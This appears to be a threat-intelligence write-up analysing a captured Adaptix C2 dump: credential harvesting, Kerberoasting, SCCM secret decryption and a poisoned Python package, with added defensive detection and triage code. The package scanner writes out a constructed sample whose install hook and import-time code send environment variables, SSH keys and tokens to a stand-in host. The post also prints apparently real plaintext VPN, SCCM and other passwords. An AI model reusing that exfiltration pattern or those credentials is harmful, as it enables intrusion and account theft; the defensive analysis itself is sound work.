Investigated: March 7, 2026 | Published: March 7, 2026

Inside an Adaptix C2 Server: Full Forensic Dump of an Active APT Engagement Against "AKRON-HOLDING" and ICG

#apt #cobalt-strike #c2 #brute-force #supply-chain #exploit

Published: 2026-03-08
Tags: threat-intelligence, C2-forensics, Adaptix, credential-harvesting, LSASS, NTLM, Kerberoasting, SCCM, DPAPI, lateral-movement, APT
TLP: WHITE (credential material redacted where appropriate)


TL;DR

We obtained a full forensic dump from an Adaptix C2 server that was actively managing an intrusion into at least two Active Directory domains -- AKRON-HOLDING and ICG (internal domain icg.stf). The dump contains LSASS memory extraction results from four workstations, 36 NTLMv2 challenge/response captures across seven accounts (20 of them for a single user), a Kerberoast TGS hash for the svc-sql service account, plaintext VPN credentials, the SCCM Network Access Account password decrypted from its DPAPI-protected policy blob, a full domain user enumeration, and the exfiltration record of a supply chain attack (scannerlib_poison) executed against the operator's own Kali box.


1. The C2 Framework: Adaptix v0.4 to v1.0

The server was running Adaptix Framework, an open-source post-exploitation C2 whose server component is written in Go. The recovered logs show two distinct runtime sessions:

First Session (v0.4) -- February 20, 2026 17:11 UTC

[===== Adaptix Framework v0.4 =====]
[+] Starting server -> https://0.0.0.0:4321/profile
[*] Restore data from Database...
   [+] Restored 3 agents
   Started listener: https://10.127.196.102:443
   Started listener: https://192.168.10.222:443

The v0.4 instance loaded the Extension-Kit BOFs (Beacon Object Files), but every module failed to parse because of a missing extender_type field -- the Extension-Kit checkout was built for a different framework version than the server running it. The modules attempted include:

  • Process-BOF -- Process enumeration/manipulation
  • LateralMovement-BOF -- Lateral movement primitives
  • Elevation-BOF -- Privilege escalation
  • Injection-BOF -- Process injection
  • AD-BOF -- Active Directory reconnaissance
  • Kerbeus-BOF -- Kerberos ticket manipulation
  • Creds-BOF -- Credential harvesting
  • SAR-BOF / SAL-BOF -- Situational awareness, remote (SAR) and local (SAL)

Two HTTPS listeners were configured but both failed to bind (address already in use): another service, or a previous C2 instance that was never stopped, already held port 443 on the host.

Second Session (v1.0) -- February 20, 2026 21:37 UTC

[===== Adaptix Framework v1.0 =====]
[+] Starting server -> https://0.0.0.0:4321/endpoint
   [+] Restored 5 agents
   [+] Restored 1 targets
   Started listener: http://10.127.196.102:443
   Started TCP listener: 10.127.196.102:4444

The upgrade to v1.0 resolved the Extension-Kit issues. The agent count grew from 3 to 5, a target was established, the port 443 listener now came up as plain HTTP rather than HTTPS, and a raw TCP listener appeared on port 4444 (named Standoff_all). The listener name is notable -- Standoff is the red-team-versus-blue-team competition platform run by Positive Technologies, so this is either operational tooling carried over from a competition environment or a real intrusion conducted by operators who hone their skills in Standoff events.

A TLS handshake error from 10.124.2.26 on February 20 at 23:51 indicates a client probing the C2 over HTTPS and receiving an unexpected response -- an agent built for a different profile, or a scanner. By February 26, two agents (4f10e251 and 5adfda44) were reported missing -- either detected and remediated, or timed out.


2. Target Environment: Two Domains, One Kill Chain

The artifacts reveal operations spanning two distinct Active Directory domains:

Domain: AKRON-HOLDING

This domain appears in all NTLMv2 hash captures. Machine accounts from this domain include:

Machine account   Significance
PKI-CES$          PKI Certificate Enrollment Service: an enterprise AD CS deployment is present
S001-N031$        Naming convention suggests standardised workstation deployment (site 001, node 031)
S083-A025$        Different site prefix: a multi-site organisation
S999-S212$        High site number: possibly a test/staging environment
WAS-AP79$         Likely a web application server (infrastructure host)

User accounts captured authenticating across this domain:

  • marin_ai -- 20 NTLMv2 challenge/response captures, the most heavily targeted account. The target-name field of the responses names both a CIFS service (cifs/10.103.197.80) and an HTTP service (HTTP/10.103.197.80) on the same host.
  • konovalov_ii -- Four captures. Some are labelled NTLMv2-SSP, which only means they were taken through the NTLM Security Support Provider (extended-security negotiation, as used by SMB2+ and HTTP) rather than raw NTLM over legacy SMB; both forms crack with the same hashcat mode (5600).

The target name embedded in an NTLMv2 response is set by the client to the service it believed it was contacting, so every capture shows workstations authenticating to 10.103.197.80 over both SMB and HTTP. That is the signature of a poisoning or coercion host: the operator ran a Responder-style capture (or relay) at this address.

Domain: ICG (icg.stf)

The internal domain icg.stf yielded far richer results. The full domain user list reveals a mid-size enterprise:

Administrative Accounts (9 total):

kamacho              -- Standalone admin (no _admin suffix, likely original)
r_thompson_admin     -- Admin tier for R. Thompson
j_hernandez_admin    -- Admin tier for J. Hernandez
c_thomas_admin       -- Admin tier for C. Thomas
l_miller_admin       -- Admin tier for L. Miller
d_dimos_admin        -- Admin tier for D. Dimos
r_gnop_admin         -- Admin tier for R. Gnop
kirill               -- Standalone admin (no naming convention)
ConfigMgrNAA         -- SCCM Network Access Account (privileged)

The naming convention (first-initial_lastname, with an _admin suffix for the privileged twin) is textbook Microsoft tiered administration. kamacho and kirill break the pattern -- they are likely either the original domain admin accounts or accounts created outside the standard provisioning process. Accounts that do not follow the convention are also the ones least likely to be covered by the tiering controls, so both deserve a closer look.

Service Accounts:

svc-sql       -- SQL Server service (Kerberoastable)
exchange      -- Exchange Server
edr           -- EDR management account
vpn           -- VPN service account
ptdadmin      -- PatchTuesday/WSUS admin
ConfigMgrNAA  -- SCCM Network Access Account

Standard Users (16 total):

c_allen, c_stein, d_jones, g_miller, j_avila, j_hernandez,
j_pineda, k_stome, l_miller, l_nichols, m_campbell, r_horse,
r_jones, r_thompson, s_barrett, engineer

3. Credential Harvesting: A Masterclass in Post-Exploitation

3.1 LSASS Memory Dumps

The LSASS results file contains structured output from automated credential extraction across four workstations in the ICG domain. Each dump followed the same pattern: minidump to C:\ProgramData\d.dmp, extract cached logons, enumerate local users, pull credential vaults, and harvest PowerShell history.
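
The pattern above is also what endpoint telemetry should catch. The following Python is an added example written for this page (it is not from the dump and not Adaptix or operator tooling): a correlation rule over Sysmon-style events that pairs a non-allow-listed process opening lsass.exe with memory-read rights (Event ID 10) with that same process writing a .dmp into a staging directory such as C:\ProgramData (Event ID 11). The events, the process allow-list and the staging directories are constructed assumptions to be tuned for a real estate.

```python
"""Endpoint detection for the LSASS-minidump pattern (added example; the dump holds the
technique's results, not the victims' telemetry).

Correlates two Sysmon-style events from the same host and source process:
  EID 10 ProcessAccess -> handle to lsass.exe with rights that allow reading its memory
  EID 11 FileCreate    -> a .dmp written under a staging directory shortly afterwards
Field names follow Sysmon; every value below, the allow-list and the staging directories
are constructed assumptions for the example.
"""
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
LSASS_ACCESS_ALLOWLIST = {  # assumed benign readers; extend for the EDR/AV actually deployed
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\program files\\windows defender\\msmpeng.exe",
}
STAGING_DIRS = ("c:\\programdata\\", "c:\\windows\\temp\\", "c:\\users\\public\\")
CORRELATION_WINDOW = timedelta(seconds=120)


def suspicious_lsass_access(ev):
    """EID 10 from a non-allow-listed image asking for memory-read rights on lsass.exe."""
    if ev["EventID"] != 10 or not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return False
    if ev["SourceImage"].lower() in LSASS_ACCESS_ALLOWLIST:
        return False
    granted = int(ev["GrantedAccess"], 16)  # Sysmon logs the access mask as a hex string
    return bool(granted & (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION))


def dump_file_create(ev):
    """EID 11 creating a .dmp inside one of the staging directories."""
    if ev["EventID"] != 11:
        return False
    target = ev["TargetFilename"].lower()
    return target.endswith(".dmp") and target.startswith(STAGING_DIRS)


def detect(events):
    """One alert per (host, process) that opened lsass and then wrote a dump within the window.

    A dump with no preceding lsass handle from the same process, or an lsass handle from an
    allow-listed image, produces nothing: both signals must come from one process on one host.
    """
    pending = {}  # (host, pid) -> the EID 10 event that opened lsass
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        key = (ev["Computer"], ev.get("SourceProcessId", ev.get("ProcessId")))
        if suspicious_lsass_access(ev):
            pending[key] = ev
        elif dump_file_create(ev) and key in pending:
            opened = pending.pop(key)
            delta = ev["UtcTime"] - opened["UtcTime"]
            if delta <= CORRELATION_WINDOW:
                alerts.append({"host": ev["Computer"], "process": opened["SourceImage"],
                               "granted_access": opened["GrantedAccess"],
                               "dump": ev["TargetFilename"], "seconds": delta.seconds})
    return alerts


def sample_events():
    """Constructed telemetry: one true positive on LMILLER plus two benign decoys."""
    t0 = datetime(2026, 2, 21, 9, 14, 0)
    return [
        {"EventID": 10, "UtcTime": t0, "Computer": "LMILLER", "SourceProcessId": 5120,
         "SourceImage": "C:\\Windows\\Temp\\svc.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe",
         "GrantedAccess": "0x1FFFFF"},
        {"EventID": 11, "UtcTime": t0 + timedelta(seconds=3), "Computer": "LMILLER", "ProcessId": 5120,
         "Image": "C:\\Windows\\Temp\\svc.exe", "TargetFilename": "C:\\ProgramData\\d.dmp"},
        # Defender scanning lsass: allow-listed reader, no alert
        {"EventID": 10, "UtcTime": t0 + timedelta(seconds=9), "Computer": "RTHOMPSON", "SourceProcessId": 2968,
         "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
         "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
        # a dump in a staging directory with no suspicious lsass handle from that process
        {"EventID": 11, "UtcTime": t0 + timedelta(seconds=30), "Computer": "RTHOMPSON", "ProcessId": 2968,
         "Image": "C:\\Windows\\System32\\WerFault.exe",
         "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\WER\\crash.dmp"},
    ]


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(alert)
```

Running it reports a single alert for LMILLER (svc.exe, 0x1FFFFF, C:\ProgramData\d.dmp, 3 seconds apart). The allow-list is the part that needs maintenance: every EDR and backup agent that legitimately reads LSASS will otherwise fire on the first signal alone, which is why the rule requires the dump write as well.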

Workstation: LMILLER

  • Minidump: 54,696,223 bytes -- extracted to C:\ProgramData\d.dmp
  • Active NTLM sessions from icg\engineer (5 concurrent network logons)
  • Local ptadmin account with network logon session
  • Local users: Administrator, L_Miller_local, ptadmin, WDAGUtilityAccount
  • Vault contained a credential for WindowsLive:target=virtualapp/didlogical -- the default Microsoft account token entry present on practically every Windows install, not a harvested secret
  • PowerShell History (Administrator): Get-FileHash C:\Users\L_Miller\Desktop\dnsmaster
  • PowerShell History (ConfigMgrNAA): Extensive reconnaissance -- navigated to .ssh, read known_hosts, downloaded PowerView.ps1 from GitHub (lucky-luk3/ActiveDirectory), enumerated the engineer account's SID

The ConfigMgrNAA PowerShell history on LMILLER is particularly revealing. The operator:

  1. Used the SCCM NAA account to navigate to L_Miller's .ssh directory and read known_hosts
  2. Downloaded PowerView.ps1 (AD enumeration tool) from a non-standard GitHub fork (lucky-luk3/ActiveDirectory)
  3. Ran Get-NetUser -Username engineer to enumerate the engineer service account
  4. Attempted to extract the binary objectSid of the engineer account. The domain SID portion is a prerequisite for forging Kerberos tickets (golden or silver), though no forged-ticket artifact was found in the dump

Workstation: RTHOMPSON

  • Minidump: 54,777,983 bytes
  • Same pattern: 5x icg\engineer network sessions, local ptadmin
  • Local users: Administrator, R_Thompson_local, ptadmin, WDAGUtilityAccount
  • No interesting PowerShell history recovered

Workstation: JHERNANDEZ

  • Minidump: 54,778,031 bytes
  • Same pattern: 5x icg\engineer network sessions, local ptadmin
  • Local users: Administrator, J_Hernandez_local, ptadmin, WDAGUtilityAccount

Workstation: CTHOMAS

  • Minidump: 54,851,839 bytes
  • 5x icg\engineer network sessions, local ptadmin
  • Local users: Administrator, C_Thomas_local, ptadmin, WDAGUtilityAccount
  • PowerShell History (Administrator): Get-FileHash C:\Users\C_Thomas\Desktop\dnsmaster and Reset-ComputerMachinePassword -Credential Get-Credential
  • PowerShell History (ConfigMgrNAA): Navigated to C_Thomas/.ssh and read known_hosts
  • PowerShell History (C_Thomas): Get-FileHash C:\Users\C_Thomas\Desktop\dnsmaster

The dnsmaster file appearing on multiple users' desktops across workstations suggests either a staging payload or a domain management tool being distributed.

Key Pattern: The ptadmin Backdoor

Every compromised workstation has a local ptadmin account with network logon sessions. The name is not a Windows default, and the dump does not show who created it: it may be operator-deployed persistence (pushed through Group Policy or an SCCM task sequence, which the ConfigMgrNAA access would permit), or a pre-existing organisational account, and the similarly named ptdadmin domain account could point either way. From a defender's standpoint the distinction barely matters: an identically named local administrator on every host, with no LAPS-managed password in evidence, is one shared secret that turns a single workstation compromise into all of them.

Key Pattern: The engineer Account

The icg\engineer account has 5 concurrent NTLM network authentication sessions on every dumped workstation. This isn't normal user behavior -- it's consistent with an automated service or a compromised account being used for lateral movement across the domain. The operator also harvested VPN credentials for this exact account (see below).

3.2 WinRM Lateral Movement Attempts

The operator attempted WinRM-based lateral movement from both LMILLER and CTHOMAS to a backup server:

WINRM_backup.icg.stf_icg\ConfigMgrNAA: FAIL
WINRM_backup.icg.stf_icg\engineer: FAIL
WINRM_backup_icg\ConfigMgrNAA: FAIL
WINRM_10.154.21.66_icg\ConfigMgrNAA: FAIL
WINRM_10.154.21.66_icg\engineer: FAIL
WINRM_SYSTEM_backup.icg.stf: FAIL
WINRM_SYSTEM_10.154.21.66: FAIL

All WinRM connections to the backup server (backup.icg.stf / 10.154.21.66) failed -- with the ConfigMgrNAA and engineer accounts, and also when run as SYSTEM (which authenticates remotely as the source workstation's machine account). The backup server appears to have WinRM disabled or restricted to specific principals, which is appropriate hardening for a backup host. The LAPS queries (LAPS_OLD, LAPS_NEW, LAPS_ENC, i.e. the legacy ms-Mcs-AdmPwd attribute and the Windows LAPS msLAPS-Password / msLAPS-EncryptedPassword attributes) also returned empty: LAPS is either not deployed or the querying account lacks read permission on those attributes. The identical ptadmin account on every dumped workstation makes "not deployed" the more likely reading.

3.3 SCCM Network Access Account Decryption

The most operationally significant credential recovery came from DPAPI-protected SCCM policy secrets. From both LMILLER and JRAMIREZ workstations, the operator extracted and decrypted the SCCM Network Access Account:

NetworkAccessUsername_DECRYPTED: icg\ConfigMgrNAA
NetworkAccessPassword_DECRYPTED: sdafasdfsadf2342532SDF!@!DF03

This is a well-known attack path. The SCCM NAA credential is delivered to every managed client in the machine policy and stored locally under DPAPI protection in the WMI/CIM repository. With local admin on any SCCM-managed machine, an attacker can decrypt it with that machine's DPAPI keys. Two caveats for defenders: the NAA blobs persist in the CIM repository (objects.data) even after the account is removed from the site configuration, so removing the NAA without rotating its password leaves the secret recoverable; and the account should never hold more than read access to distribution point content. The password sdafasdfsadf2342532SDF!@!DF03 appears to be a keyboard-mash password -- superficially complex but produced by hitting keys rather than by a generator.

This credential also appears in the dev_passwords.md artifact, confirming it was successfully recovered and added to the operator's password list.

3.4 VPN Credentials

Two sets of VPN credentials were recovered:

User       Password               Source
engineer   iSn(wXB.$DeLO1V[k+zm   vpn_creds.md, icg_vpn_auth.md
support    DblfYjZABjbzkUR        vpn_creds2.md

The engineer VPN credential appeared in two separate artifact files (vpn_creds.md and icg_vpn_auth.md), and this is the same account that maintains persistent NTLM sessions across all compromised workstations. This account likely serves as the primary persistence mechanism -- VPN in, authenticate everywhere.

3.5 NTLMv2 Hash Collection

The all_hashes.md file contains 36 NTLMv2 challenge/response pairs captured with a Responder-style listener or during a relay. Every response carries a target name of cifs/10.103.197.80 or HTTP/10.103.197.80 -- the SMB and HTTP services the clients believed they were authenticating to:

  • PKI-CES$ (1 hash) -- The PKI Certificate Enrollment Server machine account
  • S001-N031$ (7 hashes) -- Repeated captures from the same workstation
  • WAS-AP79$ (1 hash) -- Web application server
  • marin_ai (20 hashes) -- Heavy targeting via both CIFS and HTTP relay
  • konovalov_ii (4 hashes) -- Targeted via both CIFS and HTTP relay
  • S083-A025$ (1 hash) -- Workstation from a different site
  • S999-S212$ (1 hash) -- Possible staging environment workstation

The volume of marin_ai captures (20 hashes) suggests either a persistent poisoner sitting on this user's LLMNR/NBT-NS traffic, or repeated coercion (e.g. via malicious shortcuts, SCF files, or print spooler abuse). A captured NTLMv2 response is only useful offline -- it has to be cracked (hashcat mode 5600) -- whereas a relay must use the authentication live and is stopped by SMB signing and Extended Protection on the target.

3.6 Kerberoasting: svc-sql

The svc_sql_hash.md and all_spn.hashes files contain a Kerberos TGS-REP hash for the svc-sql service account:

$krb5tgs$23$*svc-sql$ICG.STF$icg.stf/svc-sql*$...

This is a standard Kerberoasting attack -- requesting a service ticket for the SQL Server service account and cracking it offline. Two details can be read straight off the line. The etype is 23 (RC4-HMAC), which means the svc-sql account still accepts RC4: its msDS-SupportedEncryptionTypes has not been restricted to AES, so the requester could ask for an RC4-encrypted ticket even in a domain where AES is otherwise in use. RC4 tickets crack with hashcat mode 13100 and are far cheaper to attack than AES ones (modes 19600/19700). And the "SPN" field reads icg.stf/svc-sql, i.e. realm/sAMAccountName rather than a registered SPN (an MSSQLSvc/host:port entry); that is how Impacket's GetUserSPNs.py labels a ticket it requested by account name, consistent with the Impacket checkout found on the Kali box. If the svc-sql password is weak, offline cracking yields the plaintext.
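
To show what can be read off these hash lines without any other telemetry, here is an added Python example (not part of the dump and not operator tooling) that parses both formats in this section: for NTLMv2 it decodes the client-challenge blob and extracts the AV_PAIRs, which is where the cifs/10.103.197.80 target name and the capture timestamp come from; for the krb5tgs lines it reads the etype, maps it to the hashcat mode, and flags the realm/account SPN labelling. The sample lines are constructed, with filler bytes in every cryptographic field.

```python
"""Triage of captured NTLMv2 and Kerberoast lines (added example for 3.5/3.6; constructed samples).

NTLMv2, hashcat 5600:  USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB
  BLOB is NTLMv2_CLIENT_CHALLENGE: 01 01, 6 reserved bytes, FILETIME(8), client challenge(8),
  4 reserved bytes, then AV_PAIRs (AvId u16 LE, AvLen u16 LE, value; strings UTF-16LE) ended
  by MsvAvEOL. MsvAvTargetName (AvId 9) is the SPN the client believed it was authenticating
  to, which is how "cifs/10.103.197.80" can be read off a hash line with no other telemetry.
Kerberoast, Impacket layout:  RC4  $krb5tgs$23$*USER$REALM$SPN*$CHECKSUM$EDATA   (hashcat 13100)
                              AES  $krb5tgs$17|18$USER$REALM$*SPN*$CHECKSUM$EDATA (19600/19700)
"""
import re
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
          5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
KRB_ETYPES = {23: ("rc4-hmac", 13100), 17: ("aes128-cts-hmac-sha1-96", 19600), 18: ("aes256-cts-hmac-sha1-96", 19700)}
KRB_RE = re.compile(r"^\$krb5tgs\$(\d+)\$\*?([^$*]+)\$([^$*]+)\$\*?([^$*]+)\*\$([0-9a-f]+)\$([0-9a-f]+)$", re.I)


def filetime_to_datetime(ft):
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_av_pairs(data):
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:  # MsvAvEOL
            break
        value, off = data[off:off + av_len], off + av_len
        name = AV_IDS.get(av_id, f"Av{av_id}")
        if av_id in (1, 2, 3, 4, 5, 9):
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs


def parse_ntlmv2(line):
    user, _, rest = line.partition("::")
    domain, server_challenge, ntproof, blob_hex = rest.split(":", 3)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    av = parse_av_pairs(blob[28:])  # 2 + 6 + 8 + 8 + 4 header bytes precede the AV_PAIRs
    return {"type": "ntlmv2", "hashcat_mode": 5600, "user": user, "domain": domain,
            "machine_account": user.endswith("$"), "target": av.get("TargetName"),
            "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]), "av_pairs": av}


def parse_krb5tgs(line):
    m = KRB_RE.match(line)
    if not m:
        raise ValueError("not an Impacket-style krb5tgs line")
    etype, user, realm, spn = int(m.group(1)), m.group(2), m.group(3), m.group(4)
    name, mode = KRB_ETYPES.get(etype, ("unknown", None))
    # realm/sAMAccountName in the SPN slot is how GetUserSPNs.py labels a ticket it requested
    # by account name instead of by a registered SPN (a heuristic, not proof of the tool used)
    return {"type": "krb5tgs", "user": user, "realm": realm, "spn": spn, "etype": etype,
            "etype_name": name, "hashcat_mode": mode, "rc4": etype == 23,
            "impacket_label": spn.lower() == f"{realm}/{user}".lower()}


def triage(lines):
    stripped = [x.strip() for x in lines]
    return [parse_krb5tgs(l) if l.startswith("$krb5tgs$") else parse_ntlmv2(l) for l in stripped if l]


def summarize(records):
    """Per-account counts, hosts named as NTLM targets (the capture position), RC4-roastable accounts."""
    ntlm = [r for r in records if r["type"] == "ntlmv2" and r["target"]]
    return {"per_account": dict(Counter(r["user"] for r in records)),
            "capture_hosts": sorted({r["target"].split("/", 1)[1] for r in ntlm}),
            "rc4_roastable": sorted({r["user"] for r in records if r["type"] == "krb5tgs" and r["rc4"]})}


def build_blob(target, nb_computer, ts, client_challenge=b"\x11" * 8):
    """Build an NTLMv2_CLIENT_CHALLENGE for the samples (the inverse of the parser above)."""
    d = ts - FILETIME_EPOCH  # integer arithmetic: float seconds would lose the 100 ns resolution
    ft = struct.pack("<Q", (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10)
    av = lambda av_id, value: struct.pack("<HH", av_id, len(value)) + value
    pairs = av(1, nb_computer.encode("utf-16-le")) + av(9, target.encode("utf-16-le")) + av(7, ft) + av(0, b"")
    return b"\x01\x01" + b"\x00" * 6 + ft + client_challenge + b"\x00" * 4 + pairs


def sample_lines():
    """Constructed stand-ins for all_hashes.md / svc_sql_hash.md lines; crypto fields are filler."""
    t = datetime(2026, 2, 21, 10, 32, 15, tzinfo=timezone.utc)
    cifs = build_blob("cifs/10.103.197.80", "S001-N031", t).hex()
    http = build_blob("HTTP/10.103.197.80", "S001-N031", t + timedelta(seconds=4)).hex()
    return [f"marin_ai::AKRON-HOLDING:{'aa' * 8}:{'bb' * 16}:{cifs}",
            f"marin_ai::AKRON-HOLDING:{'aa' * 8}:{'cc' * 16}:{http}",
            f"S001-N031$::AKRON-HOLDING:{'dd' * 8}:{'ee' * 16}:{cifs}",
            f"$krb5tgs$23$*svc-sql$ICG.STF$icg.stf/svc-sql*${'01' * 16}${'02' * 32}",
            f"$krb5tgs$18$svc-sql$ICG.STF$*icg.stf/svc-sql*${'03' * 12}${'04' * 32}"]


if __name__ == "__main__":
    recs = triage(sample_lines())
    for r in recs:
        print(r["type"], r["user"], r.get("target") or r.get("spn"), "hashcat", r["hashcat_mode"])
    print(summarize(recs))
```

The summary lists 10.103.197.80 as the only capture host, which is exactly the inference made from all_hashes.md above, and separates the RC4 line (13100) from an AES256 line (19700) of the same account. The timestamp in the blob is the client's clock at the moment it answered the challenge, so sorting captures by it reconstructs when the poisoner was active even though the artifact file carries no timestamps of its own.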


4. The Operator's Dev Environment: Password Arsenal

The dev_passwords.md file reveals the operator's accumulated credential collection:

ycL4PBvua2GhBRkJ          -- Generated/recovered password
sdafasdfsadf2342532SDF!@!DF03  -- SCCM NAA (confirmed decrypted)
Y+BtA0j5JMlw5fb           -- Generated/recovered password
blue1388                   -- Weak pattern password
grey7732                   -- Weak pattern password
P3nt3st2026!               -- Likely the operator's OWN password (pentest-themed)
Init123                    -- Default/initial password
admin                      -- Default credential
password                   -- Default credential

The password P3nt3st2026! stands out -- it follows the pattern of a pentest team password (year-suffixed, leetspeak), strongly suggesting the operator is from a professional penetration testing or red team background. This aligns with the Standoff competition reference in the C2 listener naming.

The dev_users.md file lists a separate user roster that includes teamcity and gitlab service accounts alongside user accounts with _admin suffix variants (h_moreno_admin, j_owens_admin). This appears to be a different target environment or an expanded scope beyond the ICG/AKRON-HOLDING domains -- possibly a development/CI-CD infrastructure.


5. Supply Chain Compromise: The scannerlib_poison

One of the most interesting artifacts is scannerlib_exfil.md -- it contains data exfiltrated from the operator's own Kali machine via a poisoned Python library:

=== HOSTNAME ===
kali
PWD=/tmp/scannerlib_poison
SSH_CLIENT=1.1.1.13 63881 22
SSH_CONNECTION=1.1.1.13 63881 192.168.10.222 22
USER=kali

The operator's Kali box (192.168.10.222) was compromised through a poisoned Python library executed from /tmp/scannerlib_poison. The environment block shows the process ran inside an SSH session from 1.1.1.13; that establishes where the session came from, not who opened it -- the intruder (or a rival team in a competition context), or the operator themselves running a package they had pulled in. Either way, on execution the library exfiltrated:

  • Full environment variables
  • User identity (uid=1000(kali))
  • All git repositories on the system
  • SSH key locations (/home/kali/.ssh/id_rsa)
  • pip configuration
  • GitLab tokens
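
What scannerlib_poison did on execution is exactly the behaviour a package triage should look for before a tool is pulled onto an operator box. The Python below is an added example, not the poisoned library (which was not recovered): it statically walks a package's sources and reports import-time calls, install hooks (cmdclass in setup.py), network/process imports, os.environ reads, and string literals that point at SSH keys, pip configuration or token-like environment variable names. The sample package it writes to a temporary directory is a constructed stand-in that is parsed and never executed; the scannerlib name and the 192.0.2.10 address in it are invented.

```python
"""Static triage of a Python package for import-time collection and exfiltration behaviour
(added example; the constructed sample package below is parsed, never executed).

Flags, per .py file:
  - imports of modules giving network or process access (socket, subprocess, urllib, ...)
  - reads of os.environ (the dump's "full environment variables")
  - string literals naming secret stores (~/.ssh, id_rsa, pip.conf, .git-credentials, ...)
    or secret-looking environment variable names (GITLAB_TOKEN, *_PASSWORD, ...)
  - module-level calls in package code (these run on `import`, before any function is used)
  - a cmdclass= argument in setup.py (code that runs on `pip install`)
"""
import ast
import re
import tempfile
import textwrap
from pathlib import Path

NETWORK_OR_EXEC = {"socket", "subprocess", "urllib", "requests", "http", "ftplib", "smtplib", "ctypes"}
SECRET_PATHS = (".ssh", "id_rsa", "id_ed25519", "pip.conf", ".gitconfig", ".git-credentials",
                ".netrc", "known_hosts", ".aws", ".kube")  # assumed list; extend per estate
SECRET_ENV_RE = re.compile(r"^[A-Z0-9_]*(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY)$")


def _top_module(name):
    return name.split(".")[0]


def scan_source(src, filename):
    """Return (file, line, kind, detail) tuples for one source file."""
    tree = ast.parse(src, filename)
    findings = []
    is_setup = filename.endswith("setup.py")
    if not is_setup:  # setup.py legitimately calls setup() at module level
        for node in tree.body:
            if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
                findings.append((filename, node.lineno, "import-time call", ast.unparse(node.value)))
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _top_module(alias.name) in NETWORK_OR_EXEC:
                    findings.append((filename, node.lineno, "network/exec import", alias.name))
        elif isinstance(node, ast.ImportFrom) and node.module and _top_module(node.module) in NETWORK_OR_EXEC:
            findings.append((filename, node.lineno, "network/exec import", node.module))
        elif (isinstance(node, ast.Attribute) and node.attr == "environ"
              and isinstance(node.value, ast.Name) and node.value.id == "os"):
            findings.append((filename, node.lineno, "environment read", "os.environ"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value.lower() for p in SECRET_PATHS):
                findings.append((filename, node.lineno, "secret-store path", node.value))
            elif SECRET_ENV_RE.match(node.value):
                findings.append((filename, node.lineno, "secret env var name", node.value))
        elif is_setup and isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    findings.append((filename, node.lineno, "install hook (cmdclass)", ast.unparse(kw.value)))
    return findings


def scan_package(root):
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.py")):
        findings.extend(scan_source(path.read_text(), path.relative_to(root).as_posix()))
    return findings


def write_sample_package():
    """Write a constructed package that mimics the observed behaviour; returns its root directory."""
    root = Path(tempfile.mkdtemp(prefix="pkg-triage-"))
    (root / "setup.py").write_text(textwrap.dedent("""\
        from setuptools import setup
        from setuptools.command.install import install
        import subprocess

        class PostInstall(install):
            def run(self):
                install.run(self)
                subprocess.run(["python", "-c", "import scannerlib"])

        setup(name="scannerlib", version="0.1", packages=["scannerlib"],
              cmdclass={"install": PostInstall})
    """))
    pkg = root / "scannerlib"
    pkg.mkdir()
    (pkg / "__init__.py").write_text(textwrap.dedent("""\
        import os, glob, urllib.request

        def _collect():
            data = dict(os.environ)
            data["keys"] = glob.glob(os.path.expanduser("~/.ssh/id_*"))
            data["gitlab"] = os.environ.get("GITLAB_TOKEN")
            return data

        def _send(payload):
            urllib.request.urlopen("http://192.0.2.10/c", data=repr(payload).encode())

        _send(_collect())  # executes on import, before the caller uses any scanner function

        def scan(host):
            return f"scanning {host}"
    """))
    (pkg / "clean.py").write_text("def helper(x):\n    return x * 2\n")
    return root


if __name__ == "__main__":
    for finding in scan_package(write_sample_package()):
        print("%s:%d  %-24s %s" % finding)
```

The scan is deliberately syntactic: it does not need to import the package, which is the whole point when the package is suspected of doing its work at import time. It will not see behaviour hidden behind exec of an obfuscated string or a compiled extension, so a clean report is a first filter, not a verdict; a finding of "import-time call" next to a network import is the pattern to stop on.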

The git repository enumeration reveals the operator's toolkit:

Repository                                                    Purpose
/tmp/sccmhunter                                               SCCM exploitation toolkit
/tmp/doc-macro-exploit                                        Office macro payload generation
/tmp/eviloffice                                               Malicious Office document creation
/tmp/follina                                                  CVE-2022-30190 (Follina) exploit
/tmp/macro_reverse_shell                                      Macro-based reverse shell
/tmp/phuip-fpizdam                                            PHP-FPM RCE exploit (CVE-2019-11043)
/tmp/check_bitrix                                             Bitrix CMS vulnerability scanner
/tmp/bitrix-exploit                                           Bitrix CMS exploitation
/tmp/PassTheCert                                              AD CS certificate abuse tool
